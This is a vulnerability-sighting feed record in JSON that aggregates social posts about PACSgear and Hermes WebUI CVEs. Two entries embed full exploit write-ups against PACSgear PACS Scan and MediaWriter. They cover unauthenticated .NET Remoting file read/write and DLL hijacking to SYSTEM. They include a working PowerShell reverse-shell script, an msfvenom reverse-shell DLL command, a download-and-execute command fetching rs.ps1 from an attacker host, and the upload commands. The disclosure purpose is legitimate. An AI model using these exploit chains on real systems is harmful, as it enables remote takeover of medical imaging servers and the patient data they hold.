{"vulnerability": "cve-2026-5812", "sightings": [{"uuid": "1808c8e5-1abc-42fd-b495-b4c8c313a648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-5812", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mizlvzfkmx2z", "content": "", "creation_timestamp": "2026-04-09T00:55:12.525600Z"}, {"uuid": "d3c60c88-af4e-4421-9554-8c862b8f3b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://gist.github.com/VAMorales/6dc232729cdd517fa30d581fbcd98d8f", "content": "# 1. Exploit Title: PACSGEAR PACS Scan - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58126](https://www.cve.org/cverecord?id=CVE-2026-58126)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGear PACS Scan exposes on all interfaces a .NET Remoting service on port 22222 registered by the executable file PGImageExchQueue.exe. The RegisterWellKnownServiceType function is used to register the .NET Remoting TCP channel for the service configured. The registered ObjectURI is PGImageExchange. By modifying the Proof of Concept of an object unmarshalling technique discovered by researchers of Code-White, implementing the .NET WebClient class method to read/write internal files and using a custom channel sink to force the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. This exploitation only requires the knowledge of a valid ObjectURI, which is default across all instances and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PGImageExchangeQueueSvc.exe, running as NT Authority\\SYSTEM, attempts to load multiple missing dynamic-link libraries file system paths (e.g. CRYPTSP.DLL) when started, resulting in DLL hijacking oportunities when combined with the .NET Remoting AFR primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO_Lazy.exe tcp://:22222/PGImageExchange C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nThe following code is the PowerShell TCP Reverse Connection script used for code execution.\n\n```powershell\n$IPAddress = '192.168.179.136'\n$Port      = '8443'\n \n# Reverse Shell - v4.0 Compatible\n$RSC = New-Object System.Net.Sockets.TCPClient($IPAddress, $Port)\n$Strm = $RSC.GetStream()\n[byte[]]$DB = 0..65535 | % {0}\n \n# StringWriter for output buffering\n$OB = New-Object System.IO.StringWriter\n \nwhile (($i = $Strm.Read($DB, 0, $DB.Length)) -ne 0) {\n    Try {\n        # Using the static Encoding property (v4.0 safe)\n        $Comm = [System.Text.Encoding]::ASCII.GetString($DB, 0, $i)\n        $CommOut = (iex $Comm *&gt;&amp;1 | Out-String)\n    } Catch {\n        $CommOut = \"$($Error[0])`n\"\n    }\n \n    $OB.Write($CommOut)\n    $ProStr = $OB.ToString() + 'PS ' + (PWD).Path + '&gt; ' \n    $ProBts = [System.Text.Encoding]::ASCII.GetBytes($ProStr)\n\n    $Strm.Write($ProBts, 0, $ProBts.Length)\n    $Strm.Flush()\n\n    # Clear the buffer for the next command\n    $OB.GetStringBuilder().Clear() | Out-Null\n}\n \n$Strm.Close()\n$RSC.Close()\n```\n\nThe open-source tool DlHell from Synacktiv, which supports local and remote DCOM-based Windows DLL proxying, was slightly modified to compile for 32-bit architectures. A PowerShell reverse TCP connection script was developed and exported as a malicious DLL payload for use named test.dll, which will get triggered by CRYPTST.DLL upon a service/system restart. Even though from Linux, it was not fully possible to compile the dynamic-link libraries, DlHell still generates the necessary files and definitions to repair the export tables from Windows.\n\n```bash\npython3 DLHell32.py -t template-32.tpe -c \"powershell.exe -ExecutionPolicy Bypass -c \\\\\\\"IEX (New-Object Net.WebClient).DownloadString('http://192.168.179.130/rs.ps1')\\\\\\\"\" -local-lib 'lib/cryptsp.dll' -local-target test.dll\n```\n\nThe following Windows command outputs an object file intended for later linking in a Windows build.\n\n`cl /nologo /c /01 /GS- /DWIN32 cryptsp.cpp`\n\nThe following Windows command links the compiled object file (cryptsp.obj) into a DLL.\n\n`link /nologo /DLL /DEF:cryptsp.def cryptsp.obj /OUT:cryptsp.dll`\n\nThe arbitrary file write primitive is used to upload the malicious generated dynamic-link libraries using the modified version of RemotingClient_MBRO technique.\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\cryptsp.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\cryptsp.dll\"`\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\test.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\test.dll\"`\n\nExploitation requires a restart of the affected service. Based on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. These tasks cannot be performed by a low-privileged user.\n\nAfter restarting the PGImageExchangeQueueSvc.exe service, which attempts to load the dynamic-link library CRYPTST.DLL, test.dll is triggered, causing the remote host to connect to an attacker-controlled web server on port 80 and execute the PowerShell reverse connection script.\n\nThe reverse connection is established and runs as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T11:51:57.085870Z"}, {"uuid": "5a874b21-1a6e-4ece-aa9a-253b0f59c9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58127", "type": "seen", "source": "https://gist.github.com/VAMorales/dc679ecab30b7045fa07bf3249a034d8", "content": "# 1. Exploit Title: PACSGEAR MediaWriter - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58127](https://www.cve.org/cverecord?id=CVE-2026-58127)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGear MediaWriter exposes on all interfaces a .NET Remoting service on port 9000 registered by the DLL file PacsgearMediaServerEngine.dll. The RegisterWellKnownServiceType function is used to register the .NET Remoting TCP channel for the service configured. The registered ObjectURI are RemoteObj and UIRemoteObj. By modifying the Proof of Concept of an object unmarshalling technique discovered by researchers of Code-White, implementing the .NET WebClient class method to read/write internal files and using a custom channel sink to force the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. This exploitation only requires the knowledge of a valid ObjectURI, which is default across all instances and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PacsgearMediaWriterService.exe, running as NT Authority\\SYSTEM, attempts to load multiple missing dynamic-link libraries file system paths (e.g. CRYPTSP.DLL,CRYPTBASE.DLL) when started, resulting in DLL hijacking oportunities when combined with the .NET Remoting AFR primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO.exe tcp://:9000/RemoteObj C:\\Windows\\win.ini`\n`.\\RemotingClient_MBRO.exe tcp://:9000/UIRemoteObj C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nMetasploit was used to generate a malicious DLL to achieve remote code execution.\n\n`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.179.130 LPORT=8443 -f dll -o cryptbase.dll`\n\nArbitrary file write is performed to upload the malicious dynamic-link library. The files were transferred to the remote server at `C:\\Program Files (x86)\\Pacsgear\\MediaWriter\\Service\\cryptbase.dll`.\n\n`.\\RemoteClient_MBRO.exe --put tcp://192.168.179.137:9000/RemoteObj .\\cryptbase.dll \"C:\\Program Files (x86)\\PACSGEAR\\MediaWriter\\Service\\cryptbase.dll\"`\n\nExploitation requires a restart of the affected service. Based on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. These tasks cannot be performed by a low-privileged user.\n\nAfter restarting the PacsgearMediaWriterService.exe service, which attempts to load the dynamic-link library cryptbase.dll, the malicious cryptbase.dll is triggered, causing the remote host to connect to an attacker-controlled server and achieve RCE as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T12:36:40.782427Z"}, {"uuid": "2b1b1272-da82-4729-8d30-fe7886c4b609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58127", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpmyicwcvp2q", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-58127 \u0432 PACSgear MediaWriter: \u0443\u0433\u0440\u043e\u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 .NET Remoting\n\n\n\nhttps://kripta.biz/posts/F421C074-AA3F-4373-B66E-931C25C83BFC", "creation_timestamp": "2026-07-02T02:31:56.069808Z"}, {"uuid": "33758839-1cff-407d-b0e4-728613a6d8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpmzgon6cf2q", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-58126 \u0432 PACSgear PACS Scan 5.2.1: \u0443\u0433\u0440\u043e\u0437\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\n\n\nhttps://kripta.biz/posts/81A2E910-3A3A-458F-8171-9511D676DCFD", "creation_timestamp": "2026-07-02T02:48:55.069544Z"}, {"uuid": "c56c2ee6-2e8b-48b3-a462-845ef8bb78b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58127", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpqi7fo5kz2o", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-58127 \u0432 PACSgear MediaWriter: \u0443\u0433\u0440\u043e\u0437\u0430 \u0447\u0435\u0440\u0435\u0437 .NET Remoting\n\n\n\nhttps://kripta.biz/posts/3BB22626-4964-47AF-BD94-D281D1234A88", "creation_timestamp": "2026-07-03T11:51:15.958695Z"}, {"uuid": "05f5cd76-0650-42ec-a6bc-b6531693f94c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpqightla22d", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-58126 \u0432 PACSgear PACS Scan 5.2.1: \u0443\u0433\u0440\u043e\u0437\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\n\n\nhttps://kripta.biz/posts/102467E9-F7B7-4610-8F7B-2DC4BC56CC31", "creation_timestamp": "2026-07-03T11:55:13.593908Z"}, {"uuid": "ccbe04a4-17e1-49cf-8751-7981f12e1f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58123", "type": "seen", "source": "https://bsky.app/profile/stackflag.bsky.social/post/3mqamhoqmnr25", "content": "CVE-2026-58123 - hermes-webui\nA security flaw in older versions of Hermes WebUI allows attackers to run commands on the server without a password. This can happen if a hacker sends four specific\u2026\n\nToo many irrelevant or confusing CVEs? Use stackflag.com\n\n#hermeswebui #nesquena #CVE #infosec", "creation_timestamp": "2026-07-09T21:50:04.695151Z"}, {"uuid": "0bbed9ad-ff2d-4028-80d6-a762ad0b8b74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58122", "type": "seen", "source": "https://bsky.app/profile/stackflag.bsky.social/post/3mqamhqf4fl2z", "content": "CVE-2026-58122 - hermes-webui\nA security flaw in Hermes WebUI before version 0.51.307 allows unauthorized users to access internal services, potentially leading to data exposure or unauthorized actions.\u2026\n\nToo many irrelevant or confusing CVEs? Use stackflag.com\n\n#hermeswebui #nesquena #CVE #infosec", "creation_timestamp": "2026-07-09T21:50:06.449129Z"}, {"uuid": "7b09b196-aa91-4e02-a951-76e6c481d6fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58122", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mqaqdeat3r27", "content": "CVE-2026-58122 - Hermes WebUI\nCVE ID : CVE-2026-58122\n \n Published : July 9, 2026, 10:17 p.m. | 15\u00a0minutes ago\n \n Description : Hermes WebUI before 0.51.307 contains an authentication bypass vulnerability that allows unauthenticated remote attackers to circumvent local-origin ...", "creation_timestamp": "2026-07-09T22:59:14.622417Z"}, {"uuid": "2a18bbae-3517-490b-a7b8-f2fdc9e9eed1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mqaqi2e7ny2a", "content": "\ud83d\udd34 CVE-2026-58122 - Critical (9.1)\n\nHermes WebUI before 0.51.307 contains an authentication bypass vulnerability that allows unauthen...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-58122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-07-09T23:01:52.526854Z"}, {"uuid": "39192231-02ba-4fa9-89da-630773711436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58123", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mqaqiazrqg2b", "content": "\ud83d\udd34 CVE-2026-58123 - Critical (9.8)\n\nHermes WebUI before 0.51.788 contains an unauthenticated remote code execution vulnerability that...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-58123/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-07-09T23:01:59.651207Z"}, {"uuid": "b6eb1e81-c86e-44bc-853f-8fc1e1dd605b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58123", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mqarh5x7ej2i", "content": "CVE-2026-58123 - Hermes WebUI\nCVE ID : CVE-2026-58123\n \n Published : July 9, 2026, 10:17 p.m. | 15\u00a0minutes ago\n \n Description : Hermes WebUI before 0.51.788 contains an unauthenticated remote code execution vulnerability that allows remote attackers to execute arbitrary shell ...", "creation_timestamp": "2026-07-09T23:19:15.907323Z"}, {"uuid": "184d2532-7ba0-4428-aa70-35d34bcbd0be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-58122", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mqatr5udao2f", "content": "Hermes WebUI &lt;0.51.307 hit by CRITICAL auth bypass (CVE-2026-58122): Spoofed X-Forwarded-For enables SSRF &amp; config overwrite. Restrict/validate headers &amp; monitor onboarding endpoints. https://radar.offseq.com/threat/cve-2026-58122-use-of-less-trusted-source-in-nesqu-c1a99cec42d28f9e #OffSeq #CVE2...", "creation_timestamp": "2026-07-10T00:00:39.135831Z"}, {"uuid": "bf34523b-789a-468c-9faf-a3db7c519beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-58122", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116892738294124832", "content": "CVE-2026-58122 (CRITICAL): Hermes WebUI &lt;0.51.307 lets remote attackers bypass local IP restrictions via spoofed X-Forwarded-For \u2014 enabling SSRF, config overwrite, and OAuth token theft. Restrict header spoofing &amp; monitor access. https://radar.offseq.com/threat/cve-2026-58122-use-of-less-trusted-source-in-nesqu-c1a99cec42d28f9e #OffSeq #CVE202658122 #infosec #SSRF", "creation_timestamp": "2026-07-10T00:00:37.931201Z"}, {"uuid": "acc0e041-ac9b-46f8-8f39-18bb7bff4c24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-58123", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116893091456377643", "content": "CVE-2026-58123 | CRITICAL RCE in nesquena hermes-webui &lt;0.51.788: Unauthenticated attackers can execute arbitrary shell commands via terminal API in 4 HTTP requests. Restrict endpoint access until patch confirmed. https://radar.offseq.com/threat/cve-2026-58123-missing-authentication-for-critical-9dba2eca75059736 #OffSeq #RCE #infosec #CVE", "creation_timestamp": "2026-07-10T01:30:26.146525Z"}, {"uuid": "1915f5b2-10e0-4b57-9a9a-9967aa2952fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-58123", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mqayrr46nz2d", "content": "CRITICAL RCE in nesquena hermes-webui &lt;0.51.788: Missing auth on terminal API enables remote code execution via 4 unauthenticated HTTP requests. Restrict access until patch confirmed. https://radar.offseq.com/threat/cve-2026-58123-missing-authentication-for-critical-9dba2eca75059736 #OffSeq #info...", "creation_timestamp": "2026-07-10T01:30:28.444473Z"}]}